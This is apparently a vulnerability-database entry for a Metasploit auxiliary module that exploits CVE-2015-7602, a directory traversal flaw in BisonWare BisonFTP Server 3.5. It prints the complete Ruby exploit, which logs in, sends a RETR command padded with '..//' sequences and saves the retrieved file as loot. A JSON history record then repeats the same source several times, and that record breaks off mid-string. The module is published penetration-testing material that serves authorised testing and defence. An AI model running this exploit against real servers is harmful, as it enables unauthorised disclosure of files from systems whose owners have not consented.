BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure
2015-11-08T05:34:10
ID MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL Type metasploit Reporter Rapid7 Modified 2019-10-03T16:47:49
Description
This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::Ftp
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',
'Description' => %q{
This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server
version 3.5. This vulnerability allows an attacker to download arbitrary files from the server
by crafting a RETR command including file system traversal strings such as '..//.'
},
'Platform' => 'win',
'Author' =>
[
'Jay Turla', # @shipcod3, msf and initial discovery
'James Fitts',
'Brad Wolfe <brad.wolfe[at]gmail.com>'
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'EDB', '38341'],
[ 'CVE', '2015-7602']
],
'DisclosureDate' => 'Sep 28 2015'
))
register_options(
[
OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),
OptString.new('PATH', [ true, "Path to the file to disclose, relative to the root dir.", 'boot.ini'])
])
end
def check_host(ip)
begin
connect
if /BisonWare BisonFTP server product V3\.5/i === banner
return Exploit::CheckCode::Appears
end
ensure
disconnect
end
Exploit::CheckCode::Safe
end
def run_host(target_host)
begin
connect_login
sock = data_connect
# additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb
# and #7582
if sock.nil?
error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
print_status(error_msg)
elog(error_msg)
else
file_path = datastore['PATH']
file = ::File.basename(file_path)
# make RETR request and store server response message...
retr_cmd = ( "..//" * datastore['DEPTH'] ) + "#{file_path}"
res = send_cmd( ["RETR", retr_cmd])
# read the file data from the socket that we opened
# dont assume theres still a sock to read from. Per #7582
if sock.nil?
error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'
print_status(error_msg)
elog(error_msg)
return
else
# read the file data from the socket that we opened
response_data = sock.read(1024)
end
unless response_data
print_error("#{file} not found")
return
end
if response_data.length == 0
print_status("File (#{file_path})from #{peer} is empty...")
return
end
# store file data to loot
loot_file = store_loot("bisonware.ftp.data", "text", rhost, response_data, file, file_path)
vprint_status("Data returned:\n")
vprint_line(response_data)
print_good("Stored #{file_path} to #{loot_file}")
end
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e
vprint_error(e.message)
elog("#{e.class} #{e.message} #{e.backtrace * "\n"}")
rescue ::Timeout::Error, ::Errno::EPIPE => e
vprint_error(e.message)
elog("#{e.class} #{e.message} #{e.backtrace * "\n"}")
ensure
data_disconnect
disconnect
end
end
end
{"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "59a376e9ba7a4108fbda54f00d9010b2", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'\n", "published": "2015-11-08T05:34:10", "modified": "2019-10-03T16:47:49", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2019-11-22T08:34:01", "history": [{"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-05-03T20:42:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/ftp/bison_ftp_traversal", "reporter": "Rapid7", "references": ["http://www.exploit-db.com/exploits/38341/", "http://cvedetails.com/cve/cve-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2017-07-02T23:18:07", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: http://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2017-07-02T23:18:07", "differentElements": ["modified", "sourceData"], "edition": 1}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "https://www.rapid7.com/db/modules/auxiliary/scanner/ftp/bison_ftp_traversal", "reporter": "Rapid7", "references": ["http://www.exploit-db.com/exploits/38341/", "http://cvedetails.com/cve/cve-2015-7602"], "cvelist": ["CVE-2015-7602"], "lastseen": "2017-07-24T19:57:27", "history": [], "viewCount": 0, "enchantments": {}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2017-07-24T19:57:27", "differentElements": ["href", "references"], "edition": 2}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2017-08-21T15:29:17", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2017-08-21T15:29:17", "value": 6.3}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2017-08-21T15:29:17", "differentElements": ["modified", "published"], "edition": 3}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-01-28T22:01:18", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-01-28T22:01:18", "value": 6.3}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-01-28T22:01:18", "differentElements": ["modified", "published"], "edition": 4}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "2015-11-08T05:34:10", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-01-29T00:01:18", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-01-29T00:01:18", "value": 6.3}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = store_loot(\"bisonware.ftp.data\", \"text\", rhost, response_data, file, file_path)\n vprint_status(\"Data returned:\\n\")\n vprint_line(response_data)\n print_good(\"Stored #{file_path} to #{loot_file}\")\n end\n\n rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n rescue ::Timeout::Error, ::Errno::EPIPE => e\n vprint_error(e.message)\n elog(\"#{e.class} #{e.message} #{e.backtrace * \"\\n\"}\")\n ensure\n data_disconnect\n disconnect\n end\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb"}, "lastseen": "2018-01-29T00:01:18", "differentElements": ["modified", "published"], "edition": 5}, {"bulletin": {"id": "MSF:AUXILIARY/SCANNER/FTP/BISON_FTP_TRAVERSAL", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure", "description": "This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server version 3.5. This vulnerability allows an attacker to download arbitrary files from the server by crafting a RETR command including file system traversal strings such as '..//.'", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:NONE/A:NONE/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2015-7602"], "lastseen": "2018-02-08T10:10:12", "history": [], "viewCount": 0, "enchantments": {"score": {"modified": "2018-02-08T10:10:12", "value": 6.3}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'BisonWare BisonFTP Server 3.5 Directory Traversal Information Disclosure',\n 'Description' => %q{\n This module exploits a directory traversal vulnerability found in BisonWare BisonFTP server\n version 3.5. This vulnerability allows an attacker to download arbitrary files from the server\n by crafting a RETR command including file system traversal strings such as '..//.'\n },\n 'Platform' => 'win',\n 'Author' =>\n [\n 'Jay Turla', # @shipcod3, msf and initial discovery\n 'James Fitts',\n 'Brad Wolfe <brad.wolfe[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'EDB', '38341'],\n [ 'CVE', '2015-7602']\n ],\n 'DisclosureDate' => 'Sep 28 2015'\n ))\n\n register_options(\n [\n OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 32 ]),\n OptString.new('PATH', [ true, \"Path to the file to disclose, releative to the root dir.\", 'boot.ini'])\n ])\n\n end\n\n def check_host(ip)\n begin\n connect\n if /BisonWare BisonFTP server product V3\\.5/i === banner\n return Exploit::CheckCode::Appears\n end\n ensure\n disconnect\n end\n\n Exploit::CheckCode::Safe\n end\n\n def run_host(target_host)\n begin\n connect_login\n sock = data_connect\n\n # additional check per https://github.com/bwatters-r7/metasploit-framework/blob/b44568dd85759a1aa2160a9d41397f2edc30d16f/modules/auxiliary/scanner/ftp/bison_ftp_traversal.rb\n # and #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n else\n file_path = datastore['PATH']\n file = ::File.basename(file_path)\n\n # make RETR request and store server response message...\n retr_cmd = ( \"..//\" * datastore['DEPTH'] ) + \"#{file_path}\"\n res = send_cmd( [\"RETR\", retr_cmd])\n\n # read the file data from the socket that we opened\n # dont assume theres still a sock to read from. Per #7582\n if sock.nil?\n error_msg = __FILE__ <<'::'<< __method__.to_s << ':' << 'data_connect failed; posssible invalid response'\n print_status(error_msg)\n elog(error_msg)\n return\n else\n # read the file data from the socket that we opened\n response_data = sock.read(1024)\n end\n\n unless response_data\n print_error(\"#{file} not found\")\n return\n end\n\n if response_data.length == 0\n print_status(\"File (#{file_path})from #{peer} is empty...\")\n return\n end\n\n # store file data to loot\n loot_file = 